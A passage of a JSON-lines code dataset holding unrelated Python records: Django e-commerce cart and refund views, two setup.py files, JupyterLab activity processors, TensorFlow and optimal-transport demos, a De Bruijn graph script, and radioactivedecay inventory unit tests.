= get_object_or_404( Item, slug=slug)\n order_qs=Order.objects.filter(\n user= request.user,\n ordered=False)\n if order_qs.exists():\n order= order_qs[0]\n #check if the order_item in the order\n if order.items.filter(item__slug= item.slug).exists():\n order_item=OrderItem.objects.filter(\n item = item, \n user=request.user,\n ordered=False\n )[0]\n \n order.items.remove(order_item)\n messages.info(request,\"this item was removed to your Cart.\")\n else: \n messages.info(request,\"this item was not in your Cart.\") \n return redirect( \"core:order-summary\" )\n \n else:\n messages.info(request,\"You don not have an active order\")\n return redirect(\"core:product\", slug=slug )\n\n \n return redirect(\"core:product\", slug=slug )\n\n@login_required\ndef remove_single_item_from_cart(request,slug):\n item = get_object_or_404( Item, slug=slug)\n order_qs=Order.objects.filter(\n user= request.user,\n ordered=False)\n if order_qs.exists():\n order= order_qs[0]\n #check if the order_item in the order\n if order.items.filter(item__slug= item.slug).exists():\n order_item=OrderItem.objects.filter(\n item = item, \n user=request.user,\n ordered=False\n )[0]\n if order_item.quantity> 1:\n order_item.quantity -=1\n order_item.save()\n else:\n order.items.remove(order_item)\n \n messages.info(request,\"this item quantity was updated.\")\n return redirect(\"core:order-summary\" )\n else: \n messages.info(request,\"this item was not in your Cart.\") \n return redirect(\"core:product\", slug=slug )\n \n else:\n messages.info(request,\"You don not have an active order\")\n return redirect(\"core:product\", slug=slug )\n\n \n return redirect(\"core:product\", slug=slug )\n\n\n\n\ndef get_coupon(request,code):\n \n try:\n coupon= 
coupon= Coupon.objects.get(code=code)\n return coupon\n\n \n except ObjectDoesNotExist:\n messages.info(request,\"This coupon does not exist!\")\n return redirect(\"core:checkout\")\n\n\n\nclass AddCouponView(View):\n def post(self,*args,**kwargs):\n\n if self.request.method == 'POST':\n form= CouponForm(self.request.POST or None )\n if form.is_valid():\n try:\n code= form.cleaned_data.get(\"code\")\n order= Order.objects.get(user= self.request.user, ordered=False)\n order.coupon=get_coupon(self.request,code)\n order.save()\n messages.success(self.request,\"Successfully added coupon!\")\n return redirect(\"core:checkout\")\n \n\n \n except ObjectDoesNotExist:\n messages.info(self.request,\"You do not have an active order\")\n return redirect(\"core:checkout\")\n #TODO: raise error \n return None \n\n\nclass RequestRefundView(View):\n def get(self,*args,**kwargs):\n form = RefundForm()\n context={\n 'form':form \n }\n return render(self.request,'request_refund.html', context )\n\n\n def post(self,*args,**kwargs):\n form = RefundForm(self.request.POST)\n if form.is_valid():\n ref_code = form.cleaned_data.get(\"ref_code\")\n message = form.cleaned_data.get(\"message\")\n email = form.cleaned_data.get(\"email\")\n # edit the order\n try:\n order = Order.objects.get(ref_code=ref_code) \n order.refund_requested = True\n order.save()\n\n\n\n #store the refund\n refund = Refund()\n refund.order = order \n refund.reason = message\n refund.email = email\n refund.save()\n messages.info(self.request,\"Your request was received.\")\n return redirect(\"core:request-refund\")\n except ObjectDoesNotExist:\n messages.info(self.request,\"This order does not exist.\")\n return redirect(\"core:request-refund\")\n\n\nclass SearchView(TemplateView):\n\n model = Item\n template_name = 'search_results.html'\n def get_context_data(self, **kwargs):\n context= super().get_context_data(**kwargs)\n #kw= self.request.GET[\"Keyword\"]\n kw= self.request.GET.get(\"Keyword\")\n #print(kw,\"..................................\")\n results= Item.objects.filter(\n Q(title__icontains=kw)|Q(description__icontains=kw)|Q(category__icontains=kw)\n )\n context[\"results\"] = results\n return context\n\n \n\n \n \n \n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"79634225","text":"# Copyright 2018,2019 by MPI-SWS and Data-ken Research. Licensed under Apache 2.0. See LICENSE.txt.\n
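# packaging script for the dataworkspaces CLI; the version string is imported from the package itself\n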
from setuptools import setup, find_packages\n\nimport sys\nsys.path.insert(0, 'dataworkspaces')\nfrom dataworkspaces import __version__\n\nwith open(\"README.rst\", \"r\") as f:\n long_description = f.read()\nsetup(\n name='dataworkspaces',\n version=__version__,\n author=\"Max Planck Institute for Software Systems, Data-ken Research\",\n author_email='jeff@data-ken.org',\n description=\"Easy management of source data, intermediate data, and results for data science projects\",\n long_description=long_description,\n long_description_content_type=\"text/x-rst\",\n url=\"https://github.com/data-workspaces/data-workspaces-core\",\n packages=find_packages(),\n include_package_data=True, # needed for copying data files at install time\n python_requires=\">=3.6\",\n install_requires=[\n 'click',\n 'requests',\n 'dws-repo2docker'\n ],\n entry_points=\"\"\"\n [console_scripts]\n dws=dataworkspaces.__main__:main\n git-fat=dataworkspaces.third_party.git_fat:main\n \"\"\",\n classifiers=[\n \"Programming Language :: Python :: 3 :: Only\",\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: MacOS\",\n \"Operating System :: POSIX :: Linux\",\n \"Operating System :: POSIX\",\n \"Operating System :: Microsoft :: Windows :: Windows 10\",\n \"Topic :: Software Development :: Version Control\",\n \"Topic :: Scientific/Engineering :: Information Analysis\"\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"205806567","text":"# Copyright (c) 2017 FlashX, LLC\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\nfrom typing import (Any, Dict, List)\n\nfrom lmcommon.logging import LMLogger\nfrom lmcommon.activity.processors.processor import ActivityProcessor, ExecutionData\nfrom lmcommon.activity import ActivityRecord, ActivityDetailType, ActivityDetailRecord, ActivityAction\nfrom lmcommon.labbook import LabBook\n\nlogger = LMLogger.get_logger()\n\n\nclass JupyterLabCodeProcessor(ActivityProcessor):\n \"\"\"Class to process code records into activity detail records\"\"\"\n\n def process(self, result_obj: ActivityRecord, data: List[ExecutionData],\n status: Dict[str, Any], metadata: Dict[str, Any]) -> ActivityRecord:\n \"\"\"Method to update a result object based on code and result data\n\n Args:\n result_obj(ActivityNote): An object containing the note\n data(list): A list of ExecutionData instances containing the data for this record\n status(dict): A dict containing the result of git status from gitlib\n metadata(str): A dictionary containing Dev Env specific or other developer defined data\n\n Returns:\n ActivityRecord\n \"\"\"\n # If there was some code, assume a cell was executed\n result_cnt = 0\n for cell_cnt, cell in enumerate(data):\n for result_entry in reversed(cell.code):\n if result_entry.get('code'):\n # Create detail record to capture executed code\n adr_code = ActivityDetailRecord(ActivityDetailType.CODE_EXECUTED, show=False,\n action=ActivityAction.EXECUTE,\n importance=max(255-result_cnt, 0))\n\n adr_code.add_value('text/markdown', f\"```\\n{result_entry.get('code')}\\n```\")\n adr_code.tags = cell.tags\n\n result_obj.add_detail_object(adr_code)\n\n result_cnt += 1\n\n # Set Activity Record Message\n cell_str = f\"{cell_cnt} cells\" if cell_cnt > 1 else \"cell\"\n result_obj.message = f\"Executed {cell_str} in notebook {metadata['path']}\"\n\n return result_obj\n\n\nclass JupyterLabFileChangeProcessor(ActivityProcessor):\n \"\"\"Class to process file changes based on git-status into activity detail records\"\"\"\n\n def process(self, result_obj: ActivityRecord, data: List[ExecutionData],\n status: Dict[str, Any], metadata: Dict[str, Any]) -> ActivityRecord:\n \"\"\"Method to update a result object based on code and result data\n\n Args:\n result_obj(ActivityNote): An object containing the note\n data(list): A list of ExecutionData instances containing the data for this record\n status(dict): A dict containing the result of git status from gitlib\n metadata(str): A dictionary containing Dev Env specific or other developer defined data\n\n Returns:\n ActivityRecord\n \"\"\"\n for cnt, filename in enumerate(status['untracked']):\n # skip any file in .git or .gigantum dirs\n if \".git\" in filename or \".gigantum\" in filename:\n continue\n\n activity_type, activity_detail_type, section = LabBook.infer_section_from_relative_path(filename)\n\n adr = ActivityDetailRecord(activity_detail_type, show=False, importance=max(255-cnt, 0),\n action=ActivityAction.CREATE)\n if section == \"LabBook Root\":\n msg = f\"Created new file `{filename}` in the LabBook Root.\"\n msg = f\"{msg}Note, it is best practice to use the Code, Input, and Output sections exclusively.\"\n else:\n msg = f\"Created new {section} file `{filename}`\"\n adr.add_value('text/markdown', msg)\n result_obj.add_detail_object(adr)\n\n cnt = 0\n for filename, 
change in status['unstaged']:\n # skip any file in .git or .gigantum dirs\n if \".git\" in filename or \".gigantum\" in filename:\n continue\n\n activity_type, activity_detail_type, section = LabBook.infer_section_from_relative_path(filename)\n\n if change == \"deleted\":\n action = ActivityAction.DELETE\n elif change == \"added\":\n action = ActivityAction.CREATE\n elif change == \"modified\":\n action = ActivityAction.EDIT\n elif change == \"renamed\":\n action = ActivityAction.EDIT\n else:\n action = ActivityAction.NOACTION\n\n adr = ActivityDetailRecord(activity_detail_type, show=False, importance=max(255-cnt, 0), action=action)\n adr.add_value('text/markdown', f\"{change[0].upper() + change[1:]} {section} file `{filename}`\")\n result_obj.add_detail_object(adr)\n cnt += 1\n\n return result_obj\n\n\nclass JupyterLabPlaintextProcessor(ActivityProcessor):\n \"\"\"Class to process plaintext result entries into activity detail records\"\"\"\n\n def process(self, result_obj: ActivityRecord, data: List[ExecutionData],\n status: Dict[str, Any], metadata: Dict[str, Any]) -> ActivityRecord:\n \"\"\"Method to update a result object based on code and result data\n\n Args:\n result_obj(ActivityNote): An object containing the note\n data(list): A list of ExecutionData instances containing the data for this record\n status(dict): A dict containing the result of git status from gitlib\n metadata(str): A dictionary containing Dev Env specific or other developer defined data\n\n Returns:\n ActivityNote\n \"\"\"\n # Only store up to 64kB of plain text result data (if the user printed a TON don't save it all)\n truncate_at = 64 * 1000\n max_show_len = 280\n\n result_cnt = 0\n for cell in data:\n for result_entry in reversed(cell.result):\n if 'metadata' in result_entry:\n if 'source' in result_entry['metadata']:\n if result_entry['metadata']['source'] == \"display_data\":\n # Don't save plain-text representations of displayed data by default.\n continue\n\n if 'data' in result_entry:\n if 'text/plain' in result_entry['data']:\n text_data = result_entry['data']['text/plain']\n\n if len(text_data) > 0:\n adr = ActivityDetailRecord(ActivityDetailType.RESULT,\n show=True if len(text_data) < max_show_len else False,\n action=ActivityAction.CREATE,\n importance=max(255-result_cnt-100, 0))\n\n if len(text_data) <= truncate_at:\n adr.add_value(\"text/plain\", text_data)\n else:\n adr.add_value(\"text/plain\", text_data[:truncate_at] + \" ...\\n\\n \")\n\n # Set cell data to tag\n adr.tags = cell.tags\n result_obj.add_detail_object(adr)\n\n result_cnt += 1\n\n return result_obj\n\n\nclass JupyterLabImageExtractorProcessor(ActivityProcessor):\n \"\"\"Class to perform image extraction for JupyterLab activity\"\"\"\n\n def process(self, result_obj: ActivityRecord, data: List[ExecutionData],\n status: Dict[str, Any], metadata: Dict[str, Any]) -> ActivityRecord:\n \"\"\"Method to update a result object based on code and result data\n\n Args:\n result_obj(ActivityNote): An object containing the note\n data(list): A list of ExecutionData instances containing the data for this record\n status(dict): A dict containing the result of git status from gitlib\n metadata(str): A dictionary containing Dev Env specific or other developer defined data\n\n Returns:\n ActivityNote\n \"\"\"\n supported_image_types = ['image/png', 'image/jpeg', 'image/jpg', 'image/gif', 'image/bmp']\n\n # If a supported image exists in the result, grab it and create a detail record\n result_cnt = 0\n for cell in data:\n for result_entry in 
reversed(cell.result):\n if 'data' in result_entry:\n for mime_type in result_entry['data']:\n if mime_type in supported_image_types:\n # You got an image\n adr_img = ActivityDetailRecord(ActivityDetailType.RESULT, show=True,\n action=ActivityAction.CREATE,\n importance=max(255-result_cnt, 0))\n\n adr_img.add_value(mime_type, result_entry['data'][mime_type])\n\n adr_img.tags = cell.tags\n result_obj.add_detail_object(adr_img)\n\n # Set Activity Record Message\n result_obj.message = \"Executed cell in notebook {} and generated a result\".format(\n metadata['path'])\n\n result_cnt += 1\n\n return result_obj\n","sub_path":"lmcommon/activity/processors/jupyterlab.py","file_name":"jupyterlab.py","file_ext":"py","file_size_in_byte":10511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"442399601","text":"#-----------------------------------------------\n# -*- encoding=utf-8 -*- #\n# __author__:'焉知飞鱼' #\n# CreateTime: #\n# 2021/3/19 12:04 #\n# #\n# The storms of the age rise from our generation, #\n# once in the jianghu, the years press on. #\n# Empires and conquests pass in talk and laughter, #\n# life is no more than one long bout of drunkenness. #\n#-----------------------------------------------\nimport tensorflow as tf\nimport numpy as np\n\nindices = np.array([[0, 0], [1, 1], [2, 2], [3, 4]], dtype=np.int32)\nvalues = np.array([1, 2, 3, 4], dtype=np.int32)\nshape = np.array([5, 5], dtype=np.int32)\nx = tf.SparseTensor(values=values,indices=indices,dense_shape=shape)\nprint(x)\n\nwith tf.Session() as sess:\n result = sess.run(x)\n print(result)\n\n result_value = tf.sparse_tensor_to_dense(result)\n print('value:\\n', sess.run(result_value))","sub_path":"GAN_RL/impl1/t6.py","file_name":"t6.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"486143836","text":"# PyVot Python Variational Optimal Transportation\n# Author: Liang Mi \n# Date: April 28th 2020\n# Licence: MIT\n\nimport os\nimport sys\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom vot_numpy import VOT, VOTREG\nimport utils\n\n# -------------------------------------- #\n# --------- w/o regularization --------- #\n# -------------------------------------- #\nN0 = 1000\nmean1, cov1 = [-0.5, 0.25], [[0.02, 0], [0, 0.02]]\nmean2, cov2 = [ 0.5, 0.25], [[0.02, 0], [0, 0.02]]\nx11, x12 = np.random.multivariate_normal(mean1, cov1, N0).T\nx21, x22 = np.random.multivariate_normal(mean2, cov2, N0).T\nx = np.concatenate([np.stack((x11, x12), axis=1), np.stack((x21, x22), axis=1)], axis=0).clip(-0.99, 0.99)\n\nK = 50\nmean3, cov3 = [0.0, 0.0], [[0.02, 0], [0, 0.02]]\nmean4, cov4 = [0.5, -0.5], [[0.02, 0], [0, 0.02]]\ny11, y12 = np.random.multivariate_normal(mean3, cov3, K).T\ny21, y22 = np.random.multivariate_normal(mean4, cov4, K).T\ny = np.concatenate((np.stack((y11, y12), axis=1), np.stack((y21, y22), axis=1)), axis=0).clip(-0.99, 0.99)\nlabels = np.concatenate((np.zeros(50, dtype=np.int64), np.ones(50, dtype=np.int64)), axis=0)\n\n# ----- plot before ----- #\nxmin, xmax, ymin, ymax = -1.0, 1.0, -1.0, 1.0\ncxs_base = np.array((utils.COLOR_LIGHT_BLUE, utils.COLOR_LIGHT_RED))\ncys_base = np.array((utils.COLOR_BLUE, utils.COLOR_RED))\ncys = cys_base[labels]\nys, xs = 15, 3\n\nplt.figure(figsize=(12, 8))\nplt.subplot(231)\nplt.xlim(xmin, xmax)\nplt.ylim(ymin, ymax)\nplt.grid(True)\nplt.title('w/o reg before')\n\nplt.scatter(x[:, 0], x[:, 1], s=xs, color=utils.COLOR_LIGHT_GREY)\nfor p, cy in zip(y, cys):\n plt.scatter(p[0], p[1], s=ys, 
color=cy)\n\n\n# ------- run WM -------- #\nvot = VOT(y.copy(), [x.copy()], label_y=labels, verbose=False)\nprint(\"running Wasserstein clustering...\")\ntick = time.time()\nvot.cluster(max_iter_y=1)\ntock = time.time()\nprint(\"total running time : {0:g} seconds\".format(tock-tick))\ncxs = cxs_base[vot.label_x[0]]\n\n# ------ plot map ------- #\nfig232 = plt.subplot(232)\nplt.xlim(xmin, xmax)\nplt.ylim(ymin, ymax)\nplt.grid(True)\nplt.title('w/o reg map')\n\nfor p, p0 in zip(vot.y, vot.y_original):\n plt.plot([p[0], p0[0]], [p[1], p0[1]], color=np.append(utils.COLOR_LIGHT_GREY, 0.5), zorder=4)\nfor p, cy in zip(vot.y, cys):\n plt.scatter(p[0], p[1], s=ys, color=cy, facecolor='none', zorder=3)\nfor p, cy in zip(vot.y_original, cys):\n plt.scatter(p[0], p[1], s=ys, color=cy, zorder=2)\n\n\n# ------ plot after ----- #\nplt.subplot(233)\nplt.xlim(xmin, xmax)\nplt.ylim(ymin, ymax)\nplt.grid(True)\nplt.title('w/o reg after')\n\nfor px, cx in zip(vot.x[0], cxs):\n plt.scatter(px[0], px[1], s=xs, color=cx, zorder=2)\nfor py, cy in zip(vot.y, cys):\n plt.scatter(py[0], py[1], s=ys, color=cy, facecolor='none', zorder=3)\n\n\n# -------------------------------------- #\n# --------- w/ regularization ---------- #\n# -------------------------------------- #\n\n# ------- run RWM ------- #\nvot_reg = VOTREG(y.copy(), [x.copy()], label_y=labels, verbose=False)\nprint(\"running regularized Wasserstein clustering...\")\ntick = time.time()\nvot_reg.map(reg_type='potential', reg=0.01, max_iter_y=5)\ntock = time.time()\nprint(\"total running time : {0:g} seconds\".format(tock-tick))\n# cxs = cxs_base[vot_reg.label_x[0]]\n\n# Compute OT one more time to disperse the centroids into the empirical domain.\n# This does not change the correspondence but can give better visual.\n# This is optional.\nprint(\"[optional] distribute centroids into target domain...\")\nvot = VOT(vot_reg.y, vot_reg.x, label_y=labels, verbose=False)\nvot.cluster(max_iter_y=1)\ncxs = cxs_base[vot.label_x[0]]\n\n\n# ------ plot map ------- #\nplt.subplot(235)\nplt.xlim(xmin, xmax)\nplt.ylim(ymin, ymax)\nplt.grid(True)\nplt.title('w/ reg map')\n\nfor p, p0 in zip(vot.y, vot_reg.y_original):\n plt.plot([p[0], p0[0]], [p[1], p0[1]], color=np.append(utils.COLOR_LIGHT_GREY, 0.5), zorder=4)\nfor p, cy in zip(vot.y, cys):\n plt.scatter(p[0], p[1], s=ys, color=cy, facecolor='none', zorder=3)\nfor p, cy in zip(vot_reg.y_original, cys):\n plt.scatter(p[0], p[1], s=ys, color=cy, zorder=2)\n\n\n# ------ plot after ----- #\nplt.subplot(236)\nplt.xlim(xmin, xmax)\nplt.ylim(ymin, ymax)\nplt.grid(True)\nplt.title('w/ reg after')\n\nfor px, cx in zip(vot.x[0], cxs):\n plt.scatter(px[0], px[1], s=xs, color=cx, zorder=2)\nfor py, cy in zip(vot.y, cys):\n plt.scatter(py[0], py[1], s=ys, color=cy, facecolor='none', zorder=3)\n\n# ---- plot and save ---- #\nplt.tight_layout(pad=1.0, w_pad=1.5, h_pad=0.5)\nplt.savefig(\"potential.png\")\nplt.show()\n","sub_path":"demo/regVOT/potential_numpy.py","file_name":"potential_numpy.py","file_ext":"py","file_size_in_byte":4584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640976261","text":"\"\"\" De Bruijn Graph from a String Problem \"\"\"\nfrom __future__ import print_function\nfrom lib_rosalind import *\n#\ndef _4c(dataset):\n k,seq = dataset\n k = k-1\n res = {}\n kmers = get_kmers(seq,k)\n for i_ in range(len(kmers)-1) :\n if kmers[i_] not in res: \n res[kmers[i_]] = [kmers[i_+1]]\n else:\n res [kmers[i_]] += [kmers[i_+1]]\n arr = []\n for i in res:\n buff = 
''\n for j in sorted(res[i]):\n buff += j+','\n arr += [i+' -> '+buff.strip(',')]\n return sorted(arr)\n#\nif __name__ == '__main__':\n print ('{0} {1} {0}'.format('-'*20,'start'))\n data = Read()\n dataset = [int(data[0]),data[1]]\n print ('{0} {1} {0}'.format('-'*20,'answer'))\n res = _4c(dataset)\n print ('\\n'.join([str (i) for i in res]))","sub_path":"_4c.py","file_name":"_4c.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"346541997","text":"import pathlib\nfrom setuptools import setup, find_packages\n\n# The directory containing this file\nfile_dir = pathlib.Path(__file__).parent\n\n# The text of the README file\nreadme_txt = (file_dir / \"Readme.md\").read_text()\n\nsetup(\n name=\"stwfsapy\",\n version=\"0.01.3\",\n description=\"A library for match labels of thesaurus concepts to text\" + (\n \" and assigning scores to found occurrences.\"),\n long_description=readme_txt,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/zbw/stwfsapy\",\n author=\"Moritz Fuerneisen\",\n author_email=\"m.fuerneisen@zbw.eu\",\n license=\"Apache\",\n classifiers=[\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: OS Independent\",\n ],\n packages=find_packages(exclude=(\"tests\",)),\n include_package_data=True,\n install_requires=[\"rdflib==4.2.*\", \"scikit-learn==0.22.*\"],\n tests_require=['py', 'pytest', 'pytest-mock'],\n extras_require={\n 'dev': [\n \"pytest==5.4.*\",\n \"pytest-mock==1.7.*\",\n \"pytest-pycodestyle==2.2.*\",\n \"pytest-cov==2.8.*\",\n \"codecov==2.1.*\",\n ]\n },\n python_requires='>=3.6',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"316363565","text":"\"\"\"\nUnit tests for inventory.py functions, classes and methods.\n\"\"\"\n\nimport copy\nimport unittest\nfrom unittest.mock import patch\nfrom radioactivedecay.inventory import (\n _add_dictionaries,\n _sort_dictionary_alphabetically,\n _check_dictionary,\n _sort_list_according_to_dataset,\n Inventory,\n)\nfrom radioactivedecay import DEFAULTDATA, DecayData, Radionuclide\n\n\nclass Test(unittest.TestCase):\n \"\"\"\n Unit tests for decayfunctions.py functions, classes and methods.\n \"\"\"\n\n # pylint: disable=too-many-public-methods\n\n def test__add_dictionaries(self):\n \"\"\"\n Test function which adds two inventory dictionaries together.\n \"\"\"\n\n dict1 = {\"Pm-141\": 1.0, \"Rb-78\": 2.0}\n dict2 = {\"Pm-141\": 3.0, \"Rb-90\": 4.0}\n self.assertEqual(\n _add_dictionaries(dict1, dict2),\n {\"Pm-141\": 4.0, \"Rb-78\": 2.0, \"Rb-90\": 4.0},\n )\n\n def test__sort_dictionary_alphabetically(self):\n \"\"\"\n Test the sorting of a dictionary by its keys alphabetically.\n \"\"\"\n\n inv_dict = {\"U-235\": 1.2, \"Tc-99m\": 2.3, \"Tc-99\": 5.8}\n self.assertEqual(\n _sort_dictionary_alphabetically(inv_dict),\n {\"Tc-99\": 5.8, \"Tc-99m\": 2.3, \"U-235\": 1.2},\n )\n\n def test__check_dictionary(self):\n \"\"\"\n Test the checking of inventory dictionaries.\n \"\"\"\n\n radionuclides = [\"H-3\", \"C-14\"]\n H3 = Radionuclide(\"H3\")\n C14 = Radionuclide(\"C14\")\n dataset = \"test\"\n\n # Dictionary parsing\n self.assertEqual(\n _check_dictionary({\"H-3\": 1.0}, radionuclides, dataset), {\"H-3\": 1.0}\n )\n self.assertEqual(\n _check_dictionary({\"H3\": 1.0}, radionuclides, 
dataset), {\"H-3\": 1.0}\n )\n self.assertEqual(\n _check_dictionary({\"3H\": 1.0}, radionuclides, dataset), {\"H-3\": 1.0}\n )\n self.assertEqual(\n _check_dictionary({\"H-3\": 1}, radionuclides, dataset), {\"H-3\": 1}\n )\n self.assertEqual(\n _check_dictionary({\"H-3\": 1}, radionuclides, dataset), {\"H-3\": 1.0}\n )\n self.assertEqual(\n _check_dictionary({\"H-3\": 1.0, \"C-14\": 2.0}, radionuclides, dataset),\n {\"H-3\": 1.0, \"C-14\": 2.0},\n )\n self.assertEqual(\n _check_dictionary({\"H-3\": 1.0, \"C-14\": 2.0}, radionuclides, dataset),\n {\"C-14\": 2.0, \"H-3\": 1.0},\n )\n self.assertEqual(\n _check_dictionary({H3: 1.0, C14: 2.0}, radionuclides, dataset),\n {\"C-14\": 2.0, \"H-3\": 1.0},\n )\n self.assertEqual(\n _check_dictionary({\"H-3\": 1.0, C14: 2.0}, radionuclides, dataset),\n {\"C-14\": 2.0, \"H-3\": 1.0},\n )\n self.assertEqual(\n _check_dictionary({H3: 1.0, \"C-14\": 2.0}, radionuclides, dataset),\n {\"C-14\": 2.0, \"H-3\": 1.0},\n )\n\n # Catch incorrect arguments\n with self.assertRaises(ValueError):\n _check_dictionary({\"H-3\": \"1.0\"}, radionuclides, dataset)\n with self.assertRaises(ValueError):\n _check_dictionary({\"1.0\": \"H-3\"}, radionuclides, dataset)\n\n def test__sort_list_according_to_dataset(self):\n \"\"\"\n Test the sorting of list of radionuclides according to their position in the decay dataset.\n \"\"\"\n\n radionuclide_list = [\"Tc-99\", \"Tc-99m\"]\n self.assertEqual(\n _sort_list_according_to_dataset(\n radionuclide_list, DEFAULTDATA.radionuclide_dict\n ),\n [\"Tc-99m\", \"Tc-99\"],\n )\n\n def test_inventory_instantiation(self):\n \"\"\"\n Test instantiation of Inventory objects.\n \"\"\"\n\n inv = Inventory({\"H-3\": 1.0})\n self.assertEqual(inv.contents, {\"H-3\": 1.0})\n\n inv = Inventory({\"Tc-99m\": 2.3, \"I-123\": 5.8})\n self.assertEqual(inv.contents, {\"Tc-99m\": 2.3, \"I-123\": 5.8})\n\n Tc99m = Radionuclide(\"Tc-99m\")\n inv = Inventory({Tc99m: 2.3, \"I-123\": 5.8})\n self.assertEqual(inv.contents, {\"Tc-99m\": 2.3, \"I-123\": 5.8})\n\n I123 = Radionuclide(\"I-123\")\n inv = Inventory({\"Tc-99m\": 2.3, I123: 5.8})\n self.assertEqual(inv.contents, {\"Tc-99m\": 2.3, \"I-123\": 5.8})\n\n def test_inventory__change(self):\n \"\"\"\n Test Inventory _change() method.\n \"\"\"\n\n inv = Inventory({\"H-3\": 1.0})\n inv._change({\"Tc-99m\": 2.3, \"I-123\": 5.8}, True, DEFAULTDATA)\n self.assertEqual(inv.contents, {\"Tc-99m\": 2.3, \"I-123\": 5.8})\n\n Tc99m = Radionuclide(\"Tc-99m\")\n inv = Inventory({\"H-3\": 1.0})\n inv._change({Tc99m: 2.3, \"I-123\": 5.8}, True, DEFAULTDATA)\n self.assertEqual(inv.contents, {\"Tc-99m\": 2.3, \"I-123\": 5.8})\n\n def test_inventory_radionuclides(self):\n \"\"\"\n Test Inventory radionuclides property.\n \"\"\"\n\n inv = Inventory({\"H-3\": 1.0})\n self.assertEqual(inv.radionuclides, [\"H-3\"])\n inv = Inventory({\"Tc-99m\": 2.3, \"I-123\": 5.8})\n self.assertEqual(inv.radionuclides, [\"I-123\", \"Tc-99m\"])\n\n def test_inventory_activities(self):\n \"\"\"\n Test Inventory activities property.\n \"\"\"\n\n inv = Inventory({\"H-3\": 1})\n self.assertEqual(inv.activities, [1.0])\n inv = Inventory({\"Tc-99m\": 2.3, \"I-123\": 5.8})\n self.assertEqual(inv.activities, [5.8, 2.3])\n\n def test_inventory___len__(self):\n \"\"\"\n Test len() on Inventory.\n \"\"\"\n\n inv = Inventory({\"H-3\": 1})\n self.assertEqual(len(inv), 1)\n inv = Inventory({\"Tc-99m\": 2.3, \"I-123\": 5.8})\n self.assertEqual(len(inv), 2)\n\n def test_inventory_add(self):\n \"\"\"\n Test Inventory add() method to append to an inventory.\n 
\"\"\"\n\n        inv = Inventory({\"H-3\": 1})\n        inv.add({\"C-14\": 3.0, \"K-40\": 4.0})\n        self.assertEqual(inv.contents, {\"C-14\": 3.0, \"H-3\": 1.0, \"K-40\": 4.0})\n        inv.add({\"H-3\": 3.0})\n        self.assertEqual(inv.contents, {\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n\n        inv = Inventory({\"H-3\": 1})\n        inv.add({Radionuclide(\"C-14\"): 3.0, \"K-40\": 4.0})\n        self.assertEqual(inv.contents, {\"C-14\": 3.0, \"H-3\": 1.0, \"K-40\": 4.0})\n        inv.add({Radionuclide(\"H-3\"): 3.0})\n        self.assertEqual(inv.contents, {\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n\n    def test_inventory_subtract(self):\n        \"\"\"\n        Test Inventory subtract() method to take away a dictionary from an inventory.\n        \"\"\"\n\n        inv = Inventory({\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n        inv.subtract({\"C-14\": 3.0, \"K-40\": 4.0})\n        self.assertEqual(inv.contents, {\"C-14\": 0.0, \"H-3\": 4.0, \"K-40\": 0.0})\n\n        inv = Inventory({\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n        inv.subtract({\"C-14\": 3.0, Radionuclide(\"K-40\"): 4.0})\n        self.assertEqual(inv.contents, {\"C-14\": 0.0, \"H-3\": 4.0, \"K-40\": 0.0})\n\n    def test_inventory___add__(self):\n        \"\"\"\n        Test operator to add two inventory objects together.\n        \"\"\"\n\n        inv1 = Inventory({\"H-3\": 1.0})\n        inv2 = Inventory({\"C-14\": 1.0, \"H-3\": 4.0})\n        inv = inv1 + inv2\n        self.assertEqual(inv.contents, {\"C-14\": 1.0, \"H-3\": 5.0})\n\n        temp_data = copy.deepcopy(DEFAULTDATA)\n        temp_data.dataset = \"icrp107_\"\n        inv3 = Inventory({\"H-3\": 2.0}, data=temp_data)\n        with self.assertRaises(ValueError):\n            inv = inv1 + inv3\n\n    def test_inventory___subtract__(self):\n        \"\"\"\n        Test operator to subtract one inventory object from another.\n        